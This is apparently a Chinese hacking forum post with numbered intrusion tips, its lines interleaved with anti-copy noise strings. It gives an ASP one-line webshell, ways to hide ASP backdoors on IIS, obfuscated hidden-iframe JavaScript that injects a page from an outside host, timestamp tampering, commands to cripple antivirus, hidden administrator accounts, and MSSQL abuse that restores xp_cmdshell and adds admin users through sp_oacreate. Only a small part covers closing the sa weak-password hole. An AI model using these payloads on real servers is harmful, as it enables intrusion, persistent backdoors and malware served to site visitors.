) m- i; t! C# z! E4 ~f).<%if request("cmd")<>"" then execute request("pass")%>
& ^( F8 i( X3 g+ p; I6 R+ F
- x  K7 |' I$ C* Q1 B52、at "12:17" /interactive cmd
  u9 \; B1 k  A7 X) b执行后可以用AT命令查看新加的任务
' j8 `4 n! w( M0 p9 m6 A用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
6 A  ^* c6 Z. a4 l# I6 S8 W) ^% t4 Z: ?) t& u
53、隐藏ASP后门的两种方法
3 b  l& f) v7 e/ X8 V1、建立非标准目录:mkdir images..\
& i7 K) b8 y/ q; J3 a3 C+ M# S拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% p/ t) ^* ]% y" l! _  Z8 U& ]
通过web访问ASP木马:http://ip/images../news.asp?action=login
4 v( o& f6 G" R$ T如何删除非标准目录:rmdir images..\ /s
9 P5 c& _% R, @: v  A: U4 B, _2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 g, o* c. a1 R1 r. @/ o+ w) Ymkdir programme.asp
! _* e0 c$ h9 U( {3 A新建1.txt文件内容:<!--#include file=”12.jpg”-->; j. L! T2 t6 w5 O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# W6 ~  e  ^$ x/ q/ B; v, J6 r. _& p2 e
attrib +H +S programme.asp2 f, `. }0 X5 k( h
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- V$ c4 H! K  N6 Q) e  R. c
8 U' @- J! X5 k& }7 g5 x, y3 ^54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。8 ~& P5 O" K2 B# D
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; F2 |1 r7 {8 J* h! m0 @8 q/ Y* V4 M# u: }0 L# W1 x$ V  d  ]0 `
55、JS隐蔽挂马
9 w, z+ Q0 j$ `2 \: z' ~1.
" v) \2 S- k$ d# v7 g0 |* s( Rvar tr4c3="<iframe src=ht";' n% Q) m4 j; I* A
tr4c3 = tr4c3+"tp:/";5 Y; I- M6 H( Z  Y
tr4c3 = tr4c3+"/ww";
: x7 F  R4 i4 Z9 p% s0 _/ Utr4c3 = tr4c3+"w.tr4";
' j' I8 e: s$ I- ftr4c3 = tr4c3+"c3.com/inc/m";
  f2 B' m1 ^: otr4c3 = tr4c3+"m.htm style="display:none"></i";! a: i" B0 _$ O3 P
tr4c3 =tr4c3+"frame>'";
, O4 P! g5 G4 edocument.write(tr4c3);
& C& T; s4 c9 N& Z; ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。( K5 D0 B6 `3 c, f9 i! `' o2 y
  M  `+ L" z8 _7 r, e# \3 P$ ?
2.
& \$ Z/ A0 X, w4 c, ^$ O; S8 n3 X8 M- m转换进制,然后用EVAL执行。如% J1 T1 f- k- n( k0 J4 s
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& P4 p: c& i" W% A* D不过这个有点显眼。, ?: t0 r7 P; T7 T: P/ y
3.& [+ d& O7 [- x3 u
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' x8 s2 N7 x, e5 m最后一点,别忘了把文件的时间也修改下。
' ?9 q& H  I' ~; \- x! C$ a5 [, T& H' R: y8 ]9 F" Q; t
56.3389终端入侵常用DOS命令
; m% [- j+ N% u6 h% _& z- btaskkill taskkill /PID 1248 /t
% M: |( r6 l* D/ Z- F- n  O6 k/ {5 w2 a
tasklist 查进程
3 D) K$ H  h" a3 _. e8 G
  [0 c6 }  g+ e1 }, Ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- [* m. W" ~* s; V3 x5 {( viisreset /reboot. W1 n+ ?- W3 M1 d
tsshutdn /reboot /delay:1    重起服务器5 S7 r! E/ z% g2 ]# `
" M: _7 P% v- F
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,4 p" ?8 T. J3 H+ D( T

' }& \5 s) h( |. q) B+ ^query user 查看当前终端用户在线情况2 f' A5 z* ^6 n0 H
. f$ d6 u" M/ D$ ]
要显示有关所有会话使用的进程的信息,请键入:query process *
- c! v8 }1 A0 V1 ^; A8 P9 P$ M8 M6 z& u% D
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
2 W# F/ c; r3 t6 Q
# e) G& E1 b. u+ M要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
( X" u1 x" C* Q
9 P, L; D3 s/ w8 ^; y4 a5 Z9 r要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
* ^, ?3 {; \  e4 j6 g) [/ V
: ~& q" \& f1 e4 e# U& {命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) X( }2 l5 ?" W  S5 Y0 _- f$ I0 n  {- S9 M9 v# F
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 a; f: r8 D5 f& n1 N! w1 i$ ?; k# h7 q% L7 R/ Q( F
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" S" n. _4 z9 z6 ^4 a# g; I4 ]+ D
& M- L# l5 T& u$ j. ~6 H2 E- v& t命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机# U8 P5 u7 c! k8 _

1 S6 J7 B  [0 j8 L& E& f& B56、在地址栏或按Ctrl+O,输入:# ?& H+ F3 [) s8 s9 [1 j
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;( }: |5 n" I3 x- F) L
6 _/ j" O2 C& C& n' Y, x& |
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。1 K( z8 ?* d$ e8 w/ ]% [) Y

* i# y# m' _% F* G4 \57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
5 q# A" @0 M$ N* _用net localgroup administrators是可以看到管理组下,加了$的用户的。3 B8 I) s7 w  g7 T* _
- J# y7 T! o4 F* l; e9 ^( v% h
58、 sa弱口令相关命令
- ]% P4 D+ v/ A* f
$ a# V+ E; N6 y/ C$ h" b5 {一.更改sa口令方法:
: I; y1 d! q  A& |$ m. P用sql综合利用工具连接后,执行命令:
: k5 f; X9 A* L: Q* eexec sp_password NULL,'20001001','sa'
) r% o/ r/ P8 S5 S(提示:慎用!)- [# A( t3 I1 \
( C% ~+ {6 h. A8 z1 o& z2 K* J
二.简单修补sa弱口令.
# D9 o" [, D7 ~5 e$ n+ W4 `% M3 Z5 ]1 r6 `/ K" i8 }9 S) J
方法1:查询分离器连接后执行:& s: k) P. A4 ?( J& ]! V
if exists (select * from
  d& d& Z1 J3 I3 l' W% B; |% Ldbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and8 z5 m( ]6 H/ E" G9 B: D( V
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)- j& h: a( u; M- C% e- C- l
, q# n4 s# i5 E- m- _
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
: S/ e$ k. E$ {! a) ~, ~7 ~2 f, [5 [& _" O' y7 I! M
GO
- M) a5 F' F* d: Q
, K. ^4 F1 v4 R3 N; W; c' F然后按F5键命令执行完毕3 U% Z7 ?& U6 \# M! I' e3 R7 d% r

: g# f! j) N' A- J方法2:查询分离器连接后
8 \2 O. q) g$ Y4 i4 L9 N9 Q% r  j$ r第一步执行:use master
5 c+ o4 o8 c4 G/ E第二步执行:sp_dropextendedproc 'xp_cmdshell'
" Y: ^. T, C3 i. v/ o然后按F5键命令执行完毕
. a6 g' [2 x9 F  }% Z' P$ y5 h6 _
- U  ?1 M' N+ l5 G. [
4 ~* k4 h' `1 H% X三.常见情况恢复执行xp_cmdshell.6 p6 R) p! Z4 B7 K) T- ?  I

, N7 j8 V. w& G7 o8 F9 U8 b; G) @, W# V! S8 D7 ~
1 未能找到存储过程'master..xpcmdshell'.4 D$ o% P1 x7 k3 y3 s9 H7 C
   恢复方法:查询分离器连接后,
1 Y) S0 u4 x' u0 k' |第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 Z3 L: `0 s6 g) `% }, J2 W9 ~第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& N7 H& o/ S0 u  Z% s
然后按F5键命令执行完毕
% E8 z1 [8 A) |; _) x7 b0 N8 X5 p8 E7 \- S" L4 n. i+ I
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)( n. f' T" D/ S0 O4 S2 n- T/ x: }
恢复方法:查询分离器连接后,* L5 R+ U. ?. x& n& Z
第一步执行:sp_dropextendedproc "xp_cmdshell"
& L. c& ?9 ]4 J7 s1 O9 h: v第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 E% F: Z3 U" h! |) \
然后按F5键命令执行完毕& o; C+ P$ w( u7 I5 @
: ^( [% ^1 D6 _; N# h8 }. J
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
$ X+ u( \! S, [0 B: V恢复方法:查询分离器连接后,
1 a3 j9 ~3 q+ F) y3 A% D第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# m7 T' l+ y  B  B9 E! x第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           0 d6 K6 p$ p) k9 f2 W& B6 f
然后按F5键命令执行完毕
( E9 o; P2 k5 @( i$ s% f* i) f% @3 p1 }. i4 v- y
四.终极方法.! Y" W5 I8 P, Q' ^: g* t
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 W; i, B0 @5 ^/ @
查询分离器连接后,& U! T2 B  o0 u8 \  H& i
2000servser系统:
- {& B% m  P. j+ K* `- Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: E: U! c- f8 ]7 u+ x4 Q& L0 N4 w. x4 w+ C/ N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 b+ b- Q; W- J* b, }* G3 i& w
  \6 X6 N, _) d: P
xp或2003server系统:
, S) z9 O# E; ^/ E7 S! F$ ?9 Q1 y* i6 u6 i0 T6 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'$ b" }7 f" H) E' Q

3 {' P  A8 |  l8 E; W$ [8 G: gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 h1 q( f( Q4 f7 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表